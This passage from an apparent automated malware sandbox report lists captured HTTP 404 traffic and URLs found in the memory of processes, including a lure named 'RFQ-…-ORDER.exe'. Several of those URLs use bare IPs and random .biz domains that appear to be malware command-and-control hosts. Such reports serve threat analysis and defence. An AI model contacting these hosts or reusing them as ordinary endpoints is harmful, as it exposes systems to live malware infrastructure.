69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:36 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:37 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394576368.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/
Source: alg.exe, 00000003.00000003.1351399233.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1341584430.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1995457727.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1782389022.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1775425507.00000000004D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/U
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/al
Source: alg.exe, 00000003.00000003.1292422289.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1312101543.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1290392743.00000000004AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/cpfjcmisuekkT
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/l
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000002.1262521838.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000002.1262626782.0000000000B44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/liju
Source: exhilaratingly.exe, 00000004.00000002.1262521838.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/liju3
Source: alg.exe, 00000003.00000003.1290523546.000000000048F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/ngsp
Source: alg.exe, 00000003.00000003.1292383459.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/vL#o
Source: exhilaratingly.exe, 00000014.00000002.1395702171.0000000000D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/vffaaftj
Source: alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196:80/cpfjcmisuekk
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196:80/lijur
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/
Source: alg.exe, 00000003.00000003.1248416230.000000000048F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/0
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/2
Source: alg.exe, 00000003.00000003.1248416230.000000000048F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/P
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/d
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/eg
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/egeqrssrrvaebxd
Source: exhilaratingly.exe, 00000004.00000002.1262626782.0000000000B44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/fuutkfqprp
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1234361327.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/hgd
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1234361327.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/hgdN
Source: alg.exe, 00000003.00000003.1248416230.000000000048F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/p
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239:80/egeqrssrrvaebxd
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239:80/hgdh)
Source: powershell.exe, 00000010.00000002.1433852870.00000219F939C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: alg.exe, 00000003.00000003.1351399233.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1341584430.00000000004D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://knjghuig.biz/0
Source: powershell.exe, 00000010.00000002.1416575661.0000021990076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1569294071.00000268701C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: build.exe, 00000006.00000002.1707164175.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://purl.oen
Source: exhilaratingly.exe, 00000004.00000002.1259436366.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394576368.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000010.00000002.1365957011.0000021980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
